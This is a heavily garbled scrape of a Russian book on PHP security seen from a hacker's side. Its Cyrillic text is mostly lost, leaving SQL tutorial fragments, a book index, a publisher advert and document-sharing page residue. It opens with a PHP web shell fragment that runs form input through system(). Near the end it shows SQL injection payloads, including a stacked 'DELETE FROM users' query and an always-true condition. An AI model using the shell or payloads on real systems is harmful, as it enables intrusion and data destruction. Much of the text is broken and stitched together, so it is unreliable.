<BR><input type="suhmit" value="Run">
</form>
<PRE>
<?php
system($sub_com);
print($sub_com);
?>
</PRE>
Web-, Web-.
,
Web-
. ,
Shell (
) .
5.5 , . ,
.
PHP- ,
. - Web-
PHP-,
.
274
(DoS) , .
,
.
. 1000
5 .
.
Web-,
-,
IP- .
. IP-, , .
,
,
.
Web- Web, . ,
, . , ,
,
. , . , .
, .
, , . ,
.
-
, . , , . ,

.
, ,
,
. , .

, ?
, .
: , . ,
( POST GET
cookie),
.
, .
, ,
.
. , -
,
. , , , ,
(, ).
- ,
.
,
. , ,
276
.
, , ,
, ,
. , .
. Web- .
.
,
. ? , , , ,
, .
. , ,
. , !}
. ,
, .
, , -
. , - ,
, ,
.
"The
Art of Deception: Controlling the Human Element of Security" [5].
, , , , .
I/
SQL
SQL . (ANSI SQL, Transact-SQL,
PL/SQL), ANSI SQL, .

,
, SELECT, :
SELECT ___
FROM _
[ WHERE _ ]
. , :
SELECT , ,
;
FROM ,
;
WHERE , .
SQL , , .
. ,
, : ,
. ,
:
SELECT , , _
FROM
280
SELECT, "".
,
. FROM (
). SELECT FROM
.
, : , , _.
, . SELECT *:
SELECT *
FROM
, , . SELECT, :
SELECT * FROM users; SELECT * FROM forumdata;
WHERE, .
, ,
.
:
SELECT *
FROM
WHERE - ''
, : "
, ". :
.
. , MS SQL Server . LIKE,
:
SELECT *
FROM
WHERE LIKE ''
LIKE , ,
,
.
SQL :
=
>
<
1. SQL
281
D >=
<=
<>
"", "" . , . "" , "".

, , "" "", "" "". , ,
.
,
, , "":
SELECT *
FROM
WHERE > '
, , . . ,
"", , , ""? , ,
.
"", , . ,
"". , , , .
, . , . -
WHERE, :
SELECT *
FROM
WHERE 1 = 0
WHERE 1 ,
, , .
. : AND ( ), OR ( ),
NOT ( ). :
SELECT *
FROM
WHERE = ''
AND = 'qwerty'
282
, , qwerty. - , .
, . ,
OR:
SELECT *
FROM
WHERE = ''
OR = ''
, . :
SELECT *
FROM
WHERE = ''
OR = ''
AND = 'qwerty'
? qwerty. ,
, :
SELECT *
FROM
WHERE ( = ''
OR - '')
AND = 'qwerty'
, ,
qwerty, .
:
NOT;
AND;
OR.
, NOT , AND, , , .
- ,
. ,
, , . , (
1. SQL
283
, ), . , "",
, , . SQL .
, , % (). :
SELECT *
FROM
WHERE LIKE '%'
, , , ""
"":
SELECT *
FROM
WHERE LIKE '%'

INSERT INTO, :
INSERT INTO (___)
VALUES ()
,
ytrewq:
INSERT INTO (, )
VALUES (, ytrewq)
UPDATE:
UPDATE
SET _=
WHERE _
SET , WHERE . ,
. ,
qwerty:
UPDATE
SET ='qwerty'
, , SELECT:
UPDATE
1
SET ='qwerty
WHERE =''
284
.
DELETE,
:
DELETE FROM
WHERE _
, . ,
:
DELETE FROM
, . , :
DELETE FROM
WHERE =''
SQL,
(,
SQL Injection, 2.8.2).
\Chapter1
\Chapter2
\Chapter3
\Chapter4
\Chapter5
\Soft

MySQL
1. . Linux . .: -, 2005. 500 .

2. . . .: -, 2005.
350 .
3. . C++ . .: , 2004. - 350 .
4. . Delphi . .: , 2003. 370 .
5. Kevin Mitnick. The Art of Deception: Controlling the Human Element of
Security. Wiley, 2002.
Apache 18
ARPANET 5
chroot, 113
cookie 90
Cross-Site Scripting, 179
D
DNS 249
F
FIDO 5
FTP- 259
FTP- 259
G
Google 123
M
MySQL 18
112, 159
120
PHP 13, 18
136
14
ping, 125, 262
R
rl
robots.txt, 124
S
SQL Injection, 161
SQL-:
DELETE 284
FROM 280
INSERT 283
SELECT 279
UPDATE 283
WHERE 280
280
U
UNIX- 6
W
Whois, 125
290
233, 247
. .
176
:
Cross-Site Scripting 179
SQL Injection 161
224
:
201
200
193, 199
203
25
6
6
177
200
129
25
allow from 225

AllowOverwrite 226
AuthName 224
AuthType 224
AuthUserFile 224
deny from 225
file_uploads 217
Options 226
Order 225
register_globals 218
Require 224, 226
satisfy 226
upload_max_filesize 220
249
215
97
101
5
12
107
107
106
107
108
231
31
11
41
105
6
205
206
68
176
39
135
break 56
continue 56
if. .else 33
if..elsetf 48
switch 49
45
PHP- 205
190
193, 199
193
204
96
70
83
81
84
229
73
GET 75
POST 78
106
34
72
86
36
25
122
Google 123
robots.txt 124
250
225
291

221
10
10
8, 12
241
143
Perl 150
PHP 145
85
247
174
10
251
JavaScript 138
119
106
97
101
105
96
106
25
106
97
292
180

- 20
60
chdir() 107
() 105
count() 70
date() 104
defme() 42
echo() 30
ereg() 144
ereg_replace() 144
eregi() 144
eregi_replace() 145
exec() 135
fclose() 97
feof() 102
fgetc() 100
fgets() 98
fgetss() 99
file() 99, 211
file_exists() 103
fileatimeO 104
filectimeO 103
fopen() 96
fpassthru() 100
fread() 97
fseek() 102
fsockopenO 253
ftell() 103
fwrite() 101
getcwd() 106
gethostbyaddr() 249
gethostbyname() 249
gethostbynamel() 249
getservbyname() 250
getservbyport() 250
htmlspecialchars() 139
include() 25
include_once() 25
is_dir() 105
is_executable() 105
is_file() 105
is_readable() 105
is_writable() 105
IsSet() 36
mail() 268
mcrypt_ecb() 175
md5() 177
mkdir() 107
mktimeO 92
ob_end_flush() 205
ob_get_contents() 205
ob_get_length() 205
ob_start() 205
opendir() 107
passthru() 135
phpinfo() 23
preg_match() 153
preg_match_all() 154
preg_replace() 67
preg_split() 155
print() 23, 30, 210
psockopen() 253
readdir() 108
readfileO 100, 211
rename() 106
require() 25
require_once() 25
rewind() 103
rmdirO 107
session_start() 85
setcookie() 90
shell_exec() 135
socket_accept() 252
socket_bind() 252
socket_connect() 252
socket_create() 251
socket_listen() 252
( . . 293)
293
():
socket_read() 254
socket_set_blocking() 255
socket_set_timeout() 255
socket_write() 254
split() 145
spliti() 145
strlen() 65
strops() 65
substr() 64
system() 134
time() 92
trimO 68
unlink() 106
X
8
for 56
IU1
bJ\J
while* ^4
W i 1 1 1W
*s4
55
4
97
32
176
176
174
265

Soft Line 1993
, Microsoft, Oracle,
SAP, Symantec, Vrftas Citrix, Adobe .
$ of nine,
iT-, *
, &
-.
SoftLtn* Solutions
* t*
<**1*
-,
sdfiiine
.
119991, , . , 8. ./: (095) 232 00 23

E-mail: infoS'softline.ru http://www.softline.ru
. -, **6,
H I flotiy, 9 *
-
"
190005, -, ., 29
.

10.00 20.00

-
.: (812)251-41-10, e-mail: trade@techkniga.com

Фленов PHP глазами хакера

Enviado por

Dados do documento

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

Фленов PHP глазами хакера

Enviado por

Direitos autorais:

Formatos disponíveis

http://www.natahaus.

02429 24.07.00. 23.09.05.

^ " 0 "- 2<>5

PHP <?php ... ?>.

Address j ' g j http://www.vr-online.ru/php/chaptet1/embadded.php

Hello. We are glad to see you again

Windows NT MIHAIL 5.0 build 2195

Virtual Directory Support

Configuration File (phpjrii) Path

Registered PHP Streams

php, http.ftp, compress.zlib

This program makes use of the Zend Scripting Language Engine.

i Address |.g] about:blank

" " "

' " ' " " }

jjij) JJS I '

Welcome to my home page.

10, 20, $ index $ index - . ,

$index 10, $mdex. - , ,

$str = ' ';

$sum 3 ( 2 $index, 1).

$ s t r i $str2, $str3 , . . : "

print("Index > 0") ;

case 6: print(""); break;

($i=l; $i<=3; $i=$i+l)

($index=l; $index<10; $index++)

print ("$numberl > $number2 = " ) ;

print_max(). : $numberi $number2. ,

print("Word: $word; <BR>");

Hackish PHP Pranks&Tricks

$REQUEST_METHOD (GET POST), 3 3 -

Password , . . param.php suserName

index.php?showforum= , Invision Power Board. ,

. : $username $password. , $ logged 1.

, type hidden, . param.php,

<form action="session.php" method="get">

User Name: <input name="UserName">

URL PHPSESSID, SID.

d i e ( " F i l e open e r r o r " ) ;

printf ("<BR>%s", $arr[$i]),-

string ws [, int length])

$s = fread($f, 7) ,print("<P>Line 1: $s");

, filectimeO, , date (). . ,

int is_readable(string filename)

ReadDirectory ("/var/www/html/1", $offs="");

function rmdir_with_files($dir, $offs)

MySQL Apache enroot. ?

MySQL , , . Web- . , 80- , .

.; liil -' / l s e a r * i-V Favorites i&Media )

Whois Search Results

(ex. ns.example.com or 192.16.0 192)

Domain names i n the .com and . domains can new be r e g i s t e r e d

, < &lt,- < &gt, !

, <>, <i> <>. HTML

$str=ereg_replace("[ 0-9.]", "", $str);

$str=ereg_replace("[ 0-9]", "", $str);

, Web- . mysql_connect (), :

3.8.2. SQL Injection

" " , $id) ;

print('SELECT * FROM U s e r s WHERE i d = ' . $ i d ) ;

WHERE id=10;DELETE FROM users

WHERE OR, , . , ' 1' = 1 ' . , , .

SQL- INTO OUTFILE

SQL Injection. 5.3.3